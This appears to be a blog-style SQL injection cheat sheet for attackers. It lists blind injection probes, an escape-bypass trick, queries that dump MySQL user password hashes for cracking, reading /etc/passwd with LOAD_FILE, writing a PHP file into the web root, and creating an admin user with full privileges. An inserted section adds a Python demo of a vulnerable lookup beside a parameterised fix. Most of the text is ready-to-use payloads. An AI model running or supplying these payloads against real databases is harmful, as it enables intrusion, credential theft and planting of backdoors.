This cheat sheet is only for those who understand how a SQL injection attack works, yet don't care to memorize all the semantics and syntax of the queries.
If you don't know what SQL injection is, skip this post. If you insist on reading, please go and read about SQL injection first.
Image from lastwatchdog.com
Blind SQL Injection
When you're trying to enumerate, it's good to try both without and with encapsulation. Without:
1 OR 1=1
With:
1' OR '1'='1
To see whether the database is handling encapsulation correctly, just throw a blind SQL probe such as
1'1
and the error will tell you about the encapsulation handling.
Or you can use a blind probe with EXEC
1 EXEC SP_ (or EXEC XP_)
Then, to check the SQL filtering, throw these two:
1 AND 1=1
If both give the same result, it means filtering is not there, and the database is vulnerable.
To find table names with blind injection, you have to guess the name yourself and hope for a hit. It will be easier to write a script to do this for you, or to use one of the blind SQL injection tools available, but the basic query is
1' AND 1=(SELECT COUNT(*) FROM table_name); -- table_name is the one you should be guessing
Now, it is also important to know whether the user you're masquerading as has admin privileges:
1 AND USER_NAME() = 'dbo'
You will see why this is important later.
If the database has filtering enabled with mysql_real_escape_string(), then you can try cancelling it out using a backslash:
\'; your-query-here; --
One of the main points of doing a blind SQL injection attack is to force an error in the query response. One way to do that is to ask for a table that does not exist:
1' AND fake_table_name = '1
Most (not all) databases have a table called username (blame it on the web developer), so that is one less table name you have to guess. Just try to dump all the user names from the database. Try with users and <system_name>_users as well:
' OR username IS NOT NULL OR username = '
If you're lucky, you don't have to do blind injection.
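The encapsulation probes above work because user input is spliced straight into the SQL text. As an added example that is not part of this cheat sheet, here is that vulnerable lookup beside its parameterised fix, run against a constructed in-memory SQLite table (standing in for MySQL so it runs offline) with the page's own `1' OR '1'='1` and `1'1` probes; the table, account names and function names are all assumptions.

```python
import sqlite3

# Constructed sample data (not from any real system): three accounts, one admin.
SAMPLE_USERS = [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")]

# Probes quoted from the cheat sheet above.
PAYLOAD_TAUTOLOGY = "1' OR '1'='1"   # the encapsulated OR 1=1 probe
PAYLOAD_SYNTAX = "1'1"               # the quote-handling probe that forces an error


def make_db():
    """Build an in-memory SQLite database holding the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The bug the cheat sheet relies on: the input is spliced into the SQL text,
    so a quote in the input closes the 'encapsulation' and the rest becomes SQL."""
    sql = f"SELECT id, username, role FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """The fix: a bound parameter. The value travels separately from the SQL text,
    so quotes, OR clauses and comment markers in it never change the query."""
    sql = "SELECT id, username, role FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, conn, value):
    """Run one lookup and report what the caller observes: ("rows", n) for a
    normal answer, or ("error", 0) when the database rejects the query, which is
    exactly the signal the encapsulation probe on this page looks for."""
    try:
        return ("rows", len(lookup(conn, value)))
    except sqlite3.Error:
        return ("error", 0)
```

With the vulnerable lookup the tautology returns every row and the `1'1` probe produces a database error; with the bound parameter both probes simply match nothing, which is what a defender wants to see.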
Dumping SQL tables
To see the SQL version
If you get a user with admin privilege, then roll on!
List all database users (not system users!)
SELECT user FROM mysql.user;
List hash password for database users
SELECT host, user, password FROM mysql.user;
Then, use password cracking software to crack those hashes. John the Ripper is a good one.
Now, you will want to dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
Or dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';
See current database
See all databases
List all columns and tables outside the system schemas
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
Find table by a column's name. For example you want to find a table with a column called username
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
Select by row number.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;
To avoid quotes, use hexadecimal values instead.
Read local file. For example, /etc/passwd hahaha
' UNION ALL SELECT LOAD_FILE('/etc/passwd')
Write to local file
SELECT * FROM mytable INTO DUMPFILE '/opt/lampp/htdocs/newindex.php';
Get Hostname and IP address
Create a new user
CREATE USER newuser IDENTIFIED BY 'pass1';
Delete existing user
DROP USER olduser;
Make user a database admin (DBA)... wheeeeee~
GRANT ALL PRIVILEGES ON *.* TO 'newuser'@'%';
Get location of database file
Okay, I think that's enough... too much is never good.